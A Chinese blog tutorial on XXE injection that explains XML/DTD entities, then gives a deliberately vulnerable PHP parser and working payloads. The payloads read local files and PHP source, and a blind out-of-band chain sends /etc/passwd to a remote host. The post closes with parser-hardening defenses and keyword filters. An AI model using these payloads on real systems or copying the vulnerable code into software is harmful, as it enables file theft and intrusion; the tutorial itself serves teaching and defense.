Web安全——XXE

最新推荐文章于 2023-02-19 17:22:36 发布
最新推荐文章于 2023-02-19 17:22:36 发布
阅读量220 收藏
点赞数
文章标签: web安全 xml 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44607514/article/details/123517736
版权

XXE

XML介绍

  • XML 被设计用来传输和存储数据。XML 文档形成了一种树结构,它从"根部"开始,然后扩展到"枝叶"。XML 允许创作者定义自己的标签和自己的文档结构。
  • 语法规则:
    1. 所有的 XML 元素都必须有一个关闭标签
    2. XML 标签对大小写敏感
    3. XML 必须正确嵌套
    4. XML 属性值必须加引号
    5. 实体引用
    6. 在 XML 中,空格会被保留

XML DTD介绍:

  • 拥有正确语法的 XML 被称为"形式良好"的 XML。通过 DTD 验证的XML是"合法"的 XML。

  • DTD声明类型:

    1. 内部的DOCTYPE声明:<!DOCTYPE root-element[element-declareations]>
    2. 外部的文档声明:假如 DTD 位于 XML 源文件的外部,那么它应通过下面的语法被封装在一个 DOCTYPE 定义中:<!DOCTYPE root-element SYSTEM "filename">

  • DTD数据类型:

    1. PCDATA 的意思是被解析的字符数据(parsed character data)。PCDATA 是会被解析器解析的文本。这些文本将被解析器检查实体以及标记。
    2. CDATA 的意思是字符数据(character data)。CDATA 是不会被解析器解析的文本。在这些文本中的标签不会被当作标记来对待,其中的实体也不会被展开

  • DTD实体介绍:

    • 实体:用于定义引用普通文本或特殊字符的快捷方式的变量。
    1. 内部实体:<!ENTITY entity-name "entity-value">
    2. 外部实体:<!ENTITY entity-name SYSTEM "URI/URL">

XML注入产生的原理

  • XXE漏洞全称XML External Entity Injection,即XML外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。
  • xxe漏洞触发的点往往是可以上传XML文件的位置,没有对上传的XML文件进行过滤,导致可上传恶意XML文件。

XXE漏洞代码

  • file_get_content():把整个文件读入一个字符串中。

  • simplexml_load_string():将XML格式字符串转换为对应的SimpleXMLElement。

  • php://input:是一个可以访问请求的原始数据的只读流,结合file_get_contents(“php://input”)可以读取POST提交的数据。

  • XML注入回显,输入函数:php中可以使用print_r()、echo输出想要输出的内容。

  • 代码示例:

    给出完整存在XXE漏洞代码:
<?php
$xml=file_get_contents("php://input");
$data = simplexml_load_string($xml) ;
echo "<pre>" ;
print_r($data) ;//注释掉该语句即为无回显的情况
?>

    读取本地文件Payload:
<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini" >]>
<root>
<name>&xxe;</name>
</root>

XXE漏洞利用:任意文件读取

  • 测试代码:

    <?php
$xml=file_get_contents("php://input");
$data = simplexml_load_string($xml) ;
echo "<pre>" ;
print_r($data) ;//注释掉该语句即为无回显的情况
?>

  • PHP中测试POC:

    file:///path/to/file.ext
http://url/file.ext
php://filter/read=convert.base64-encode/resource=conf.php

  • 有回显的XXE利用:

    Payload:
<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "file:///c://test/flag.txt" >]>
<value>&xxe;</value>

请添加图片描述

  • 读取PHP文件:

    • 直接利用file协议读取PHP文件会出现错误,那么需要使用base64编码来进行读取。

    • payload:

      <?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=test.php
" >]>
<value>&xxe;</value>

请添加图片描述

XXE漏洞利用:任意文件读取(无回显)

  • 测试原理
    请添加图片描述
  •   <?xml version="1.0"?>
  	<!DOCTYPE foo SYSTEM "http://192.168.1.103/test.dtd">
  <foo>&e1;</foo>

请添加图片描述

  • 将test.dtd中的内容设置为下面的内容:

    <!ENTITY % p1 SYSTEM "file:///etc/passwd">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://192.168.1.103/test.php?con=%p1;'>">
%p2;

  • 抓包查看:
    请添加图片描述

XXE消亡原因

  • libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。

XXE漏洞防御

  • 使用开发语言提供的禁用外部实体的方法

    PHP:
libxml_disable_entity_loader(true);

    JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);

    Python:
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

  • 过滤用户提交的XML数据

    关键词:<!DOCTYPE和<!ENTITY,或者,SYSTEM和PUBLIC。

@@@@@@@@@@@@@@@@@@@@@@@@
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WEB安全XXE实体注入漏洞.pdf
12-12
XXE漏洞详解】 XML(eXtensible Markup Language)是一种用于存储...总之,理解和防范XXE漏洞对于维护Web应用的安全至关重要。开发人员应确保正确处理XML输入,限制XML解析器的功能,并时刻关注最新的安全最佳实践。
XML外部实体注入学习
paidx0
08-26 1556
前言 最近做题做到XXE 这类型的题,也没有系统学习过,只是简单知道他和 XML 有关,这次就了解了一下XXE 漏洞 简单了解XML XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 被设计为传输和存储数据,其焦点是数据的内容 XML 被设计用来结构化、存储以及传输信息 XML 允许创作者定义自己的标签和自己的文档结构 XML的优点 xml是互联网数据传输的重要工具,它可以跨越互联网任何的平台,不受编程语言和操作系统的限制,
XXE漏洞中DOCTYPE、ENTITY傻傻分不清-WEB安全基础入门—XML外部实体注入(XXE)
Eason_LYC安全白帽子的成长博客
07-20 2795
XML外部实体注入(XXEWEB安全系列包括如下三个专栏: 《WEB安全基础-服务器端漏洞》 《WEB安全基础-客户端漏洞》 《WEB安全高级-综合利用》 知识点全面细致,逻辑清晰、结合实战,并配有大量练习靶场,让你读一篇、练一篇,掌握一篇,在学习路上事半功倍,少走弯路! 欢迎关注订阅专栏! 专栏文章追求对知识点的全面总结,逻辑严密,方便学习掌握。力求做到看完一篇文章,掌握一类漏洞知识。让读者简洁高效的掌握WEB安全知识框架,推开入门深造的大门。 绝不为了追求文章数量,彰显内容丰富而故意拆散相关知识
XXE详解
qq_48904485的博客
03-22 5500
一、XML基础知识 1、XML简介: XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素 XML 和 HTML 为不同的目的而设计: XML 被设计用来传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息,而 XML 旨在传输信息。 2、XML 语法 1)XML 声明文件的可选部分,如果存在需要放在文
XXE - 实体注入
qq_58000413的博客
10-04 559
只是一个名字而已。XML像HTML、传输数据、无预定义(预先定义好的东西)
web渗透测试----23、XML外部实体注入--(1)XXE原理
七天
03-05 1778
XML外部实体注入漏洞
未知攻焉知防——XXE漏洞攻防.pdf
09-18
未知攻焉知防——XXE漏洞攻防 自动化 应急响应 云安全 网络信息安全 安全威胁
信息安全_xxe注入应用与拓展.pptx
08-14
2. **基于SOAP的Web Service**:SOAP(Simple Object Access Protocol)是一种基于XML的通信协议,若其处理XML输入时未进行安全验证,也可能成为XXE的入口。 3. **开发框架的Content-Type智能识别**:例如SpringMVC...
WEB安全知识总结.zip
12-27
WEB安全知识总结】 在网络安全领域,Web安全是至关重要的一个环节,因为它涉及到用户数据的保护、企业资产的安全以及服务的稳定运行。本总结将深入探讨一些常见的Web漏洞及其防范措施,帮助读者快速掌握Web安全的...
web安全漏洞挖掘梳理
06-22
Web 安全漏洞挖掘梳理 - XXE 漏洞梳理 Web 安全漏洞挖掘梳理是指在 Web 应用程序中发现和利用安全漏洞的过程。其中,XXE 漏洞是一种常见的安全漏洞,攻击者可以通过构建外部实体注入来攻击 Web 应用程序。 1.什么...
深入了解 XXE 注射
allway2的博客
07-27 271
为了揭开这个漏洞的神秘面纱,我将分解XXE的工作原理、利用XXE漏洞的一些方法,并介绍SRT提交的两个真实世界的XXE攻击(使用经过编辑的数据来保护客户端和SRT身份)。对我们来说更重要的是,它也是XML结构的,这使得它可能容易受到XXE的攻击。我们将修改前面的示例以反映这一点。旁注如果此示例中的各种alpha/bravo/charlie变量引用令人困惑,请了解执行相同XXE攻击的各种方法,每种方法都是为了绕过Web过滤器或安抚挑剔的XML解析器。...
Web漏洞探索】外部实体注入漏洞
kjcxmx的博客
07-19 1055
外部实体注入漏洞XXE(XMLExternalEntityInjection)也就是XML外部实体注入,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。file//和ftp//等协议,导致可加载恶意外部文件和代码,造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害。不允许XML中含有自己定义的DTD。...
XXE漏洞原理/防御
wangyuxiang946的博客
07-16 1万+
XXE又叫 XML外部实体注入 , 攻击者修改DTD引入的外部文件 , 从而执行攻击 。
XXE外部实体注入漏洞之——基础知识
温柔小薛的博客
04-12 375
基础知识 东西有点多,还需要消化消化,概念有些混淆了,基础构造payload和外部文件差不多理解了,其他原理还是要再学习哈 实验环境 libxml2.9.1 及以后,默认不解析外部实体。测试的时候 windows 下使用的是php5.2(libxml Version 2.7.7 ), php5.3(libxml Version 2.7.8)。Linux 中需要将 libxml低于 libxml...
XXE漏洞详解
Jeromeyoung
01-28 6485
文章目录XXE漏洞1、造成XXE的原因2、定义3、利用漏洞条件4、XXE使用5、XXE挖掘及扩展1、抓包看accept头是否接受xml2、抓包修改数据类型,把json改成xml来传输数据5、DTD基础知识构建xxe的payload达成攻击使用DTD实体的攻击方式DTD 实体声明:1. 内部实体声明2. 外部实体声明3. 参数实体声明4. 引用公共实体6、实体类别介绍总结7、XXE攻击类别及实例有回显无回显整个调用过程: XXE漏洞 利用数据格式造成攻击 1、造成XXE的原因 运维人员使用了低版本php,l
深入理解XXE漏洞。
snowlyzz的博客
08-22 874
xxe浅了解
Web渗透(十一)XML注入(XXE)
weixin_39157582的博客
11-23 1904
@TOC 0x00 前言 0x01 XML和DTD XXE漏洞全程为XML External Entity Injection ,也就是XML外部实体注入漏洞。 1、什么是XML? 百度百科 可扩展标记语言,标准通用标记语言的子集,是一种用于标记电子文件使其具有结构性的标记语言。 简单来说,它是一种语言,表现形式类似于HTML(超文本标记语言) ,而XML和HTML的差别在于,HTML是用于展示数据和页面,而XML是为了更好的存储和传输数据。 HTML的容错能力使得格式可以不必十分规范,例如有时可能忘记
XXE知识总结,有这篇就够了!
热门推荐
南迪叶先森
07-14 2万+
公粽号:黒掌 一个专注于分享渗透测试、黑客圈热点、黑客工具技术区博主! XXE基础 XXE(XML External Entity Injection)全称为XML外部实体注入,由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml_load默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。而学习XXE要从认识XML开始。 XML基础 XML 指可扩展标记语言(EXtensible Markup Lang.
(39.2)【XXE漏洞专题】XXE原理、产生、检测、危害、利用、示例
04-26 3660
【专题】XXE入门
WEB系列(五)-----------SSRF/XXE/命令执行
最新发布
weixin_41748164的博客
02-19 598
SSRF SSRF(server-site request firery,服务端请求伪造) 是一种构造请求,由服务端发起请求的安全漏洞。与CSRF不同的是发起请求的对象不同。 成因:服务端提供了从其他服务器获取数据的功能,但没有对内网目标地址做过滤与限制。 产生ssrf漏洞的函数 file_get_content() fsockopen() curl_exec() ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值